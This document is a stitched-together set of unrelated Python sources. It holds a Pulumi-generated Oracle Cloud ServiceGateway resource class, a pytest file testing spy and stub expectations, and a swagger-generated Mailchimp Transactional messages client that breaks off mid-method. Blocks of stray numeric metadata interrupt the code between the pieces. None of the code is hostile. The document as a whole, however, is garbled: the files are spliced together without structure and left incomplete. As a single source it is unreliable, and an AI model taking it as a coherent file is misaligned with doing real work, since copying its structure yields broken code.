class ServiceGateway(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
route_table_id: Optional[pulumi.Input[str]] = None,
services: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]]] = None,
vcn_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Service Gateway resource in Oracle Cloud Infrastructure Core service.
Creates a new service gateway in the specified compartment.
For the purposes of access control, you must provide the OCID of the compartment where you want
the service gateway to reside. For more information about compartments and access control, see
[Overview of the IAM Service](https://docs.cloud.oracle.com/iaas/Content/Identity/Concepts/overview.htm).
For information about OCIDs, see [Resource Identifiers](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
You may optionally specify a *display name* for the service gateway, otherwise a default is provided.
It does not have to be unique, and you can change it. Avoid entering confidential information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_service_gateway = oci.core.ServiceGateway("testServiceGateway",
compartment_id=var["compartment_id"],
services=[oci.core.ServiceGatewayServiceArgs(
service_id=data["oci_core_services"]["test_services"]["services"][0]["id"],
)],
vcn_id=oci_core_vcn["test_vcn"]["id"],
defined_tags={
"Operations.CostCenter": "42",
},
display_name=var["service_gateway_display_name"],
freeform_tags={
"Department": "Finance",
},
route_table_id=oci_core_route_table["test_route_table"]["id"])
```
## Import
ServiceGateways can be imported using the `id`, e.g.
```sh
$ pulumi import oci:core/serviceGateway:ServiceGateway test_service_gateway "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
:param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServiceGatewayArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Service Gateway resource in Oracle Cloud Infrastructure Core service.
Creates a new service gateway in the specified compartment.
For the purposes of access control, you must provide the OCID of the compartment where you want
the service gateway to reside. For more information about compartments and access control, see
[Overview of the IAM Service](https://docs.cloud.oracle.com/iaas/Content/Identity/Concepts/overview.htm).
For information about OCIDs, see [Resource Identifiers](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
You may optionally specify a *display name* for the service gateway, otherwise a default is provided.
It does not have to be unique, and you can change it. Avoid entering confidential information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_service_gateway = oci.core.ServiceGateway("testServiceGateway",
compartment_id=var["compartment_id"],
services=[oci.core.ServiceGatewayServiceArgs(
service_id=data["oci_core_services"]["test_services"]["services"][0]["id"],
)],
vcn_id=oci_core_vcn["test_vcn"]["id"],
defined_tags={
"Operations.CostCenter": "42",
},
display_name=var["service_gateway_display_name"],
freeform_tags={
"Department": "Finance",
},
route_table_id=oci_core_route_table["test_route_table"]["id"])
```
## Import
ServiceGateways can be imported using the `id`, e.g.
```sh
$ pulumi import oci:core/serviceGateway:ServiceGateway test_service_gateway "id"
```
:param str resource_name: The name of the resource.
:param ServiceGatewayArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServiceGatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
route_table_id: Optional[pulumi.Input[str]] = None,
services: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]]] = None,
vcn_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServiceGatewayArgs.__new__(ServiceGatewayArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["route_table_id"] = route_table_id
if services is None and not opts.urn:
raise TypeError("Missing required property 'services'")
__props__.__dict__["services"] = services
if vcn_id is None and not opts.urn:
raise TypeError("Missing required property 'vcn_id'")
__props__.__dict__["vcn_id"] = vcn_id
__props__.__dict__["block_traffic"] = None
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
super(ServiceGateway, __self__).__init__(
'oci:core/serviceGateway:ServiceGateway',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
block_traffic: Optional[pulumi.Input[bool]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
route_table_id: Optional[pulumi.Input[str]] = None,
services: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
vcn_id: Optional[pulumi.Input[str]] = None) -> 'ServiceGateway':
"""
Get an existing ServiceGateway resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] block_traffic: Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
:param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
:param pulumi.Input[str] state: The service gateway's current state.
:param pulumi.Input[str] time_created: The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
:param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceGatewayState.__new__(_ServiceGatewayState)
__props__.__dict__["block_traffic"] = block_traffic
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["route_table_id"] = route_table_id
__props__.__dict__["services"] = services
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["vcn_id"] = vcn_id
return ServiceGateway(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="blockTraffic")
def block_traffic(self) -> pulumi.Output[bool]:
"""
Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
"""
return pulumi.get(self, "block_traffic")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="routeTableId")
def route_table_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the route table the service gateway will use.
"""
return pulumi.get(self, "route_table_id")
@property
@pulumi.getter
def services(self) -> pulumi.Output[Sequence['outputs.ServiceGatewayService']]:
"""
(Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
"""
return pulumi.get(self, "services")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The service gateway's current state.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="vcnId")
def vcn_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
return pulumi.get(self, "vcn_id")
| 58.789649
| 648
| 0.680903
| 4,425
| 35,215
| 5.264407
| 0.062373
| 0.059498
| 0.039665
| 0.045503
| 0.90762
| 0.891779
| 0.878515
| 0.866581
| 0.860442
| 0.835029
| 0
| 0.004312
| 0.203095
| 35,215
| 598
| 649
| 58.88796
| 0.825785
| 0.511146
| 0
| 0.674051
| 1
| 0
| 0.111033
| 0.018676
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161392
| false
| 0.003165
| 0.022152
| 0
| 0.281646
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63a404a73eee452883340218134affaf9b2e8f8c
| 6,867
|
py
|
Python
|
tests/test_doubles/test_doubles_expectations_test.py
|
Avvir/pyne
|
864885a8fb632b72c00af164f150b1daa38a346f
|
[
"MIT"
] | 4
|
2018-08-10T20:05:10.000Z
|
2019-07-24T15:29:32.000Z
|
tests/test_doubles/test_doubles_expectations_test.py
|
Avvir/pyne
|
864885a8fb632b72c00af164f150b1daa38a346f
|
[
"MIT"
] | 6
|
2018-09-25T20:15:51.000Z
|
2021-12-22T17:09:52.000Z
|
tests/test_doubles/test_doubles_expectations_test.py
|
Avvir/pyne
|
864885a8fb632b72c00af164f150b1daa38a346f
|
[
"MIT"
] | null | null | null |
from pynetest.expectations import expect
from pynetest.test_doubles.spy import Spy
from pynetest.test_doubles.stub import spy_on
from tests.test_helpers.expectation_helpers import expect_expectation_to_fail_with_message
from tests.test_helpers.some_class import SomeClass
from tests.test_helpers.temporary_class import TemporaryClass
def test__was_called_with__can_pass():
spy = Spy()
spy("some-positional-argument", ["some-array-content"])
expect(spy).was_called_with("some-positional-argument", ["some-array-content"])
def test__for_an_instance_method__was_called_with__can_pass():
some_instance = SomeClass()
spy_on(some_instance.some_method)
some_instance.some_method("some-positional-argument", ["some-array-content"])
expect(some_instance.some_method).was_called_with("some-positional-argument", ["some-array-content"])
def test__for_a_static_method__was_called_with__can_pass():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
SomeTemporaryClass.some_static_method("some-positional-argument", ["some-array-content"])
expect(SomeTemporaryClass.some_static_method).was_called_with("some-positional-argument", ["some-array-content"])
def test__was_called_with__when_there_were_no_calls__fails_with_a_message():
spy = Spy()
expect_expectation_to_fail_with_message(
lambda: expect(spy).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <Spy#__call__> was called with <('some-positional-argument', ['some-array-content'])> but it was never called"""
)
def test__for_an_instance_method__was_called_with__when_there_were_no_calls__fails_with_a_message():
some_instance = SomeClass()
spy_on(some_instance.some_method)
expect_expectation_to_fail_with_message(
lambda: expect(some_instance.some_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeClass#some_method> was called with <('some-positional-argument', ['some-array-content'])> but it was never called"""
)
def test__for_a_static_method__was_called_with__when_there_were_no_calls__fails_with_a_message():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
expect_expectation_to_fail_with_message(
lambda: expect(SomeTemporaryClass.some_static_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeTemporaryClass::some_static_method> was called with <('some-positional-argument', ['some-array-content'])> but it was never called"""
)
def test__was_called_with__when_the_method_was_called_with_the_wrong_parameters__fails_with_a_message():
spy = Spy()
spy("some-positional-argument", "some-array-content")
expect_expectation_to_fail_with_message(
lambda: expect(spy).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <Spy#__call__> was called with <('some-positional-argument', ['some-array-content'])> but it was called with <('some-positional-argument', 'some-array-content')>"""
)
def test__for_an_instance_method__was_called_with__when_the_method_was_called_with_the_wrong_parameters__fails_with_a_message():
some_instance = SomeClass()
spy_on(some_instance.some_method)
some_instance.some_method("some-positional-argument", "some-array-content")
expect_expectation_to_fail_with_message(
lambda: expect(some_instance.some_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeClass#some_method> was called with <('some-positional-argument', ['some-array-content'])> but it was called with <('some-positional-argument', 'some-array-content')>"""
)
def test__for_a_static_method__was_called_with__when_the_method_was_called_with_the_wrong_parameters__fails_with_a_message():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
SomeTemporaryClass.some_static_method("some-positional-argument", "some-array-content")
expect_expectation_to_fail_with_message(
lambda: expect(SomeTemporaryClass.some_static_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeTemporaryClass::some_static_method> was called with <('some-positional-argument', ['some-array-content'])> but it was called with <('some-positional-argument', 'some-array-content')>"""
)
def test__was_called__can_pass():
spy = Spy()
spy()
expect(spy).was_called()
def test__was_called__when_the_subject_is_not_a_spy__fails_with_message():
def some_non_spy():
pass
some_non_spy()
expect_expectation_to_fail_with_message(
lambda: expect(some_non_spy).was_called(),
"""Expected that <tests.test_doubles.test_doubles_expectations_test.some_non_spy> was called but its calls were not tracked. Hint: use stub() to track its calls"""
)
def test__for_an_instance_method__was_called__can_pass():
some_instance = SomeClass()
spy_on(some_instance.some_method)
some_instance.some_method()
expect(some_instance.some_method).was_called()
def test__for_a_static_method__was_called__can_pass():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
SomeTemporaryClass.some_static_method()
expect(SomeTemporaryClass.some_static_method).was_called()
def test__was_called__when_there_were_no_calls__fails_with_a_message():
spy = Spy()
expect_expectation_to_fail_with_message(
lambda: expect(spy).was_called(),
"Expected that <Spy#__call__> was called but it was never called"
)
def test__for_an_instance_method__was_called__when_there_were_no_calls__fails_with_a_message():
some_instance = SomeClass()
spy_on(some_instance.some_method)
expect_expectation_to_fail_with_message(
lambda: expect(some_instance.some_method).was_called(),
"Expected that <SomeClass#some_method> was called but it was never called"
)
def test__for_a_static_method__was_called__when_there_were_no_calls__fails_with_a_message():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
expect_expectation_to_fail_with_message(
lambda: expect(SomeTemporaryClass.some_static_method).was_called(),
"Expected that <SomeTemporaryClass::some_static_method> was called but it was never called"
)
| 43.188679
| 223
| 0.759138
| 887
| 6,867
| 5.384442
| 0.072153
| 0.090452
| 0.081658
| 0.130653
| 0.913526
| 0.894891
| 0.883794
| 0.854271
| 0.830193
| 0.811139
| 0
| 0
| 0.142129
| 6,867
| 158
| 224
| 43.462025
| 0.810728
| 0
| 0
| 0.418367
| 0
| 0
| 0.14972
| 0.074158
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173469
| false
| 0.071429
| 0.061224
| 0
| 0.234694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
63bdbc45a2f8bde7d5c0b0812de684ad21efa5a0
| 15,675
|
py
|
Python
|
mailchimp_transactional/api/messages_api.py
|
singular-labs/mailchimp-transactional-python
|
310f2970596b30a9527ad0c45d0c977c827cd3ba
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_transactional/api/messages_api.py
|
singular-labs/mailchimp-transactional-python
|
310f2970596b30a9527ad0c45d0c977c827cd3ba
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_transactional/api/messages_api.py
|
singular-labs/mailchimp-transactional-python
|
310f2970596b30a9527ad0c45d0c977c827cd3ba
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Mailchimp Transactional API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0.47
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from mailchimp_transactional.api_client import ApiClient
class MessagesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_key='', api_client = None):
self.api_key = api_key
if api_client:
self.api_client = api_client
else:
self.api_client = ApiClient()
def cancel_scheduled(self, body = {}, **kwargs): # noqa: E501
"""Cancel scheduled email # noqa: E501
Cancels a scheduled email. # noqa: E501
"""
(data) = self.cancel_scheduled_with_http_info(body, **kwargs) # noqa: E501
return data
def cancel_scheduled_with_http_info(self, body, **kwargs): # noqa: E501
"""Cancel scheduled email # noqa: E501
Cancels a scheduled email. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel_scheduled" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/cancel-scheduled', 'POST',
body=body_params,
response_type='list[InlineResponse20035]') # noqa: E501
def content(self, body = {}, **kwargs): # noqa: E501
"""Get message content # noqa: E501
Get the full content of a recently sent message. # noqa: E501
"""
(data) = self.content_with_http_info(body, **kwargs) # noqa: E501
return data
def content_with_http_info(self, body, **kwargs): # noqa: E501
"""Get message content # noqa: E501
Get the full content of a recently sent message. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method content" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/content', 'POST',
body=body_params,
response_type='InlineResponse20033') # noqa: E501
def info(self, body = {}, **kwargs): # noqa: E501
"""Get message info # noqa: E501
Get the information for a single recently sent message. # noqa: E501
"""
(data) = self.info_with_http_info(body, **kwargs) # noqa: E501
return data
def info_with_http_info(self, body, **kwargs): # noqa: E501
"""Get message info # noqa: E501
Get the information for a single recently sent message. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method info" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/info', 'POST',
body=body_params,
response_type='InlineResponse20032') # noqa: E501
def list_scheduled(self, body = {}, **kwargs): # noqa: E501
"""List scheduled emails # noqa: E501
Queries your scheduled emails. # noqa: E501
"""
(data) = self.list_scheduled_with_http_info(body, **kwargs) # noqa: E501
return data
def list_scheduled_with_http_info(self, body, **kwargs): # noqa: E501
"""List scheduled emails # noqa: E501
Queries your scheduled emails. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_scheduled" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/list-scheduled', 'POST',
body=body_params,
response_type='list[InlineResponse20035]') # noqa: E501
def parse(self, body = {}, **kwargs): # noqa: E501
"""Parse mime document # noqa: E501
Parse the full MIME document for an email message, returning the content of the message broken into its constituent pieces. # noqa: E501
"""
(data) = self.parse_with_http_info(body, **kwargs) # noqa: E501
return data
def parse_with_http_info(self, body, **kwargs): # noqa: E501
"""Parse mime document # noqa: E501
Parse the full MIME document for an email message, returning the content of the message broken into its constituent pieces. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method parse" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/parse', 'POST',
body=body_params,
response_type='InlineResponse20034') # noqa: E501
def reschedule(self, body = {}, **kwargs): # noqa: E501
"""Reschedule email # noqa: E501
Reschedules a scheduled email. # noqa: E501
"""
(data) = self.reschedule_with_http_info(body, **kwargs) # noqa: E501
return data
def reschedule_with_http_info(self, body, **kwargs): # noqa: E501
"""Reschedule email # noqa: E501
Reschedules a scheduled email. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reschedule" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/reschedule', 'POST',
body=body_params,
response_type='list[InlineResponse20035]') # noqa: E501
def search(self, body = {}, **kwargs): # noqa: E501
"""Search messages by date # noqa: E501
Search recently sent messages and optionally narrow by date range, tags, senders, and API keys. If no date range is specified, results within the last 7 days are returned. This method may be called up to 20 times per minute. If you need the data more often, you can use /messages/info.json to get the information for a single message, or webhooks to push activity to your own application for querying. # noqa: E501
"""
(data) = self.search_with_http_info(body, **kwargs) # noqa: E501
return data
def search_with_http_info(self, body, **kwargs): # noqa: E501
"""Search messages by date # noqa: E501
Search recently sent messages and optionally narrow by date range, tags, senders, and API keys. If no date range is specified, results within the last 7 days are returned. This method may be called up to 20 times per minute. If you need the data more often, you can use /messages/info.json to get the information for a single message, or webhooks to push activity to your own application for querying. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/search', 'POST',
body=body_params,
response_type='list[InlineResponse20030]') # noqa: E501
def search_time_series(self, body = {}, **kwargs): # noqa: E501
"""Search messages by hour # noqa: E501
Search the content of recently sent messages and return the aggregated hourly stats for matching messages. # noqa: E501
"""
(data) = self.search_time_series_with_http_info(body, **kwargs) # noqa: E501
return data
def search_time_series_with_http_info(self, body, **kwargs): # noqa: E501
"""Search messages by hour # noqa: E501
Search the content of recently sent messages and return the aggregated hourly stats for matching messages. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_time_series" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/search-time-series', 'POST',
body=body_params,
response_type='list[InlineResponse20031]') # noqa: E501
def send(self, body = {}, **kwargs): # noqa: E501
"""Send new message # noqa: E501
Send a new transactional message through the Transactional API. # noqa: E501
"""
(data) = self.send_with_http_info(body, **kwargs) # noqa: E501
return data
def send_with_http_info(self, body, **kwargs): # noqa: E501
"""Send new message # noqa: E501
Send a new transactional message through the Transactional API. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method send" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/send', 'POST',
body=body_params,
response_type='list[InlineResponse20028]') # noqa: E501
def send_raw(self, body = {}, **kwargs): # noqa: E501
"""Send mime document # noqa: E501
Take a raw MIME document for a message, and send it exactly as if it were sent through the Transactional API's SMTP servers. # noqa: E501
"""
(data) = self.send_raw_with_http_info(body, **kwargs) # noqa: E501
return data
def send_raw_with_http_info(self, body, **kwargs): # noqa: E501
"""Send mime document # noqa: E501
Take a raw MIME document for a message, and send it exactly as if it were sent through the Transactional API's SMTP servers. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
